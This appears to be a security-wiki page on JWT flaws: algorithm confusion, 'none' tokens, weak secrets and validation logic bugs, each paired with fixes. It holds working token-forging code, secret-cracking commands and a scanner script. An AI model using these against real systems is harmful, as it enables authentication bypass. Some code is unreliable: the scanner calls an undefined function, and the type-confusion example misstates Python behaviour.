JWT Vulnerabilities

JSON Web Tokens (JWT) are used for authentication. Common implementation flaws allow attackers to forge tokens, bypass validation, or crack weak secrets.

JWT Structure

[Header].[Payload].[Signature]

Checklist

Algorithm Confusion (RS256 → HS256)

Server uses RS256 (asymmetric) with public/private keys, but also accepts HS256 (symmetric).
Attacker changes algorithm to HS256 and uses the PUBLIC KEY as the secret.

Vulnerable Code

public_key = open('public.pem').read()
jwt.decode(token, public_key, algorithms=['RS256', 'HS256'])  # Accepts both!

1. Get a valid JWT

curl https://target.com/login -d "user=test&pass=test"

2. Download public key (often available)

curl https://target.com/.well-known/jwks.json > public.pem

3. Decode current token

echo "eyJhbG..." | base64 -d
# Note current algorithm: RS256

4. Create malicious token with HS256

python3 << EOF
import jwt

public_key = open('public.pem', 'rb').read()
payload = {'sub': 'admin', 'role': 'admin'}

# Use public key as HMAC secret
token = jwt.encode(payload, public_key, algorithm='HS256')
print(token)
EOF

5. Test the forged token

curl https://target.com/admin \
  -H "Authorization: Bearer <forged_token>"

Prevention

Specify ONE algorithm only

jwt.decode(token, public_key, algorithms=['RS256'])  # No alternatives

None Algorithm

JWT spec allows alg: none for unsigned tokens. Some libraries accept these as valid.

Create unsigned JWT

import base64
import json

header = {"alg": "none", "typ": "JWT"}
payload = {"sub": "admin", "role": "admin"}

header_b64 = base64.urlsafe_b64encode(
    json.dumps(header).encode()
).decode().rstrip('=')

payload_b64 = base64.urlsafe_b64encode(
    json.dumps(payload).encode()
).decode().rstrip('=')

# Note the trailing period (no signature)
token = f"{header_b64}.{payload_b64}."
print(token)

Test:

curl https://target.com/admin \
  -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9."

Prevention

Reject 'none' algorithm

jwt.decode(token, secret, algorithms=['HS256'])  # 'none' not in list

Weak Secrets

JWT signed with weak/common secrets can be brute-forced to reveal the secret, allowing token forgery.

Common Weak Secrets:

secret
secret123
password
test
jwt_secret
your_secret_key_here
myapikey
default
admin

Using jwt_tool to find SECRET

git clone https://github.com/ticarpi/jwt_tool

python3 jwt_tool.py <TOKEN> -C -d /path/to/wordlist.txt

Once Secret Found forge a new one

import jwt

SECRET = "secret123"  # Cracked secret

# Forge admin token
payload = {
    'sub': 'admin',
    'role': 'admin',
    'exp': 9999999999
}

forged = jwt.encode(payload, SECRET, algorithm='HS256')
print(forged)

Prevention

Generate strong random secret (32+ bytes)
Store in environment variable

Logic Flaws in Validation

Bugs in custom JWT validation logic allow bypassing authentication.

Vulnerable Code:

@token_required
def protected_endpoint():
    token = request.args.get('token')
    if not token:
        return jsonify({'message': 'Token is missing!'}), 401
    
    try:
        data = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
        
        # LOGIC BUG Inverted boolean logic
        if not data.get('is_admin') and data.get('username') == 'dummy':
            return jsonify({'message': 'Admin access required!'}), 403
            
    except:
        return jsonify({'message': 'Token is invalid!'}), 401
    
    # Process request...

The Bug:The condition blocks access when:

is_admin is False/missing AND username == 'dummy'

But ALLOWS access when:

is_admin is True (any username)
OR username is NOT 'dummy'

Missing Null Checks

WRONG

if 'admin' in user.roles:  # What if roles is None?
    grant_access()

RIGHT

if user.roles and 'admin' in user.roles:
    grant_access()

Type Confusion

WRONG

if user_id == 1:  # What if user_id is "1" (string)?
    grant_admin()

RIGHT

if user_id == 1 and isinstance(user_id, int):
    grant_admin()

Incorrect Operator

WRONG - Always true if is_admin exists

if not is_admin or username != 'guest':
    allow()

RIGHT

if is_admin and username != 'guest':
    allow()

Prevention

Use explicit, positive validation

def validate_jwt(token):
    try:
        data = jwt.decode(
            token,
            SECRET_KEY,
            algorithms=['HS256'],
            options={
                'require': ['exp', 'iat', 'sub'],
                'verify_exp': True,
            }
        )
        
        # Explicit positive checks
        if data.get('role') != 'admin':
            raise Unauthorized('Admin role required')
        
        if not isinstance(data.get('user_id'), int):
            raise Unauthorized('Invalid user_id type')
        
        if data.get('user_id') <= 0:
            raise Unauthorized('Invalid user_id value')
            
        return data
        
    except jwt.ExpiredSignatureError:
        raise Unauthorized('Token expired')
    except jwt.InvalidTokenError:
        raise Unauthorized('Invalid token')

Automated Testing Script

#!/usr/bin/env python3
import jwt
import requests
import base64
import json

def test_jwt_security(token, url):
    """Comprehensive JWT security test"""
    
    print("[*] Testing JWT Security")
    print(f"[*] Target: {url}")
    print(f"[*] Token: {token[:50]}...")
    print()
    
    # Test 1: Decode without verification
    print("[1] Decoding token...")
    try:
        decoded = jwt.decode(token, options={"verify_signature": False})
        print(f"    Claims: {json.dumps(decoded, indent=2)}")
    except Exception as e:
        print(f"    [-] Cannot decode: {e}")
        return
    
    # Test 2: None algorithm
    print("\n[2] Testing 'none' algorithm...")
    none_token = create_none_token(decoded)
    if test_endpoint(url, none_token):
        print("    [!] VULNERABLE: Accepts 'none' algorithm")
    else:
        print("    [+] Protected against 'none' algorithm")
    
    # Test 3: Weak secret
    print("\n[3] Testing for weak secret...")
    weak_secrets = ['secret', 'secret123', 'password', 'test']
    for secret in weak_secrets:
        try:
            jwt.decode(token, secret, algorithms=['HS256'])
            print(f"    [!] VULNERABLE: Weak secret found: {secret}")
            return
        except:
            pass
    print("    [+] No weak secret found (test common ones)")
    
    # Test 4: Claim manipulation
    print("\n[4] Testing claim manipulation...")
    test_claims = [
        {'role': 'admin'},
        {'is_admin': True},
        {'admin': True},
    ]
    for claim in test_claims:
        modified = {**decoded, **claim}
        modified_token = create_unsigned_token(modified)
        if test_endpoint(url, modified_token):
            print(f"    [!] VULNERABLE: Accepts modified claim: {claim}")

def create_none_token(payload):
    """Create JWT with alg:none"""
    header = {"alg": "none", "typ": "JWT"}
    
    header_b64 = base64.urlsafe_b64encode(
        json.dumps(header).encode()
    ).decode().rstrip('=')
    
    payload_b64 = base64.urlsafe_b64encode(
        json.dumps(payload).encode()
    ).decode().rstrip('=')
    
    return f"{header_b64}.{payload_b64}."

def test_endpoint(url, token):
    """Test if endpoint accepts token"""
    try:
        r = requests.get(
            url,
            headers={'Authorization': f'Bearer {token}'},
            timeout=5
        )
        return r.status_code == 200
    except:
        return False

# Usage
if __name__ == '__main__':
    token = input("Enter JWT token: ")
    url = input("Enter protected endpoint URL: ")
    test_jwt_security(token, url)

PreviousVulnerabilities NextTOCTOU Vulnerabilities

Last updated 3 hours ago